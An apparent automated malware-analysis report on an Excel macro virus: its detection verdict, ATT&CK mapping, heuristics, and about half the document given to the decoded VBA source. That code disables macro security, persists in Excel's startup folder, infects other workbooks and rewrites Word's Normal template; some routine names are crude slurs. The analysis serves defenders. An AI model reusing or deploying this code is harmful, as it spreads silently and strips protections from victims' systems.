Verdict: MALICIOUS
Risk Score: 340
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample is identified as Xls.Trojan.War-1 by ClamAV, indicating malicious intent. It contains VBA macros, including Auto_Open and Auto_Close, which are designed to execute automatically. The script attempts to modify Excel security settings and create directories for persistence, likely to ensure the malware runs on system startup or when Excel is launched. The presence of Auto_Open and Auto_Close macros strongly suggests it's designed to be delivered as a malicious attachment.
Heuristics (7)
- ClamAV: Xls.Trojan.War-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.War-1
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8852 bytes |

SHA-256: 6b8731e16dc386455be3d5338071fbb6d1b1eca203793b0ad79956bbbb4122ea
Detection (ClamAV): Xls.Trojan.War-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Email"
'First Brazilian Excel virus for Excel 97 and Excel 2000 and Email and MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = 0
End If
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0
If Tudo() Then
GoTo SejaGay:
Else
NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
Tudo = True
End If
Next y
End If
Next x
End Function
Function NoOlho()
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
Windows("ALEVIRUSCS.XLM").Visible = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function
Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
Amerda = True
End If
Next y
End Function
Sub Puta()
oactivebook = ActiveWorkbook.Name
If Amerda() Then
GoTo cya
Else
End If
Application.ScreenUpdating = False
Application.Windows("ALEVIRUSCS.XLM").Visible = True
Workbooks("ALEVIRUSCS.XLM").Activate
Sheets("Email").Visible = True
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Email").Visible = False
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub
Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 5, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 6, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 7, "End Sub"
WordObj.Run "Normal.ThisDocument.AutoExec"
End If
Set NT = Nothing
If Quit = True Then WordObj.Quit
End Sub
Private Sub
... (truncated)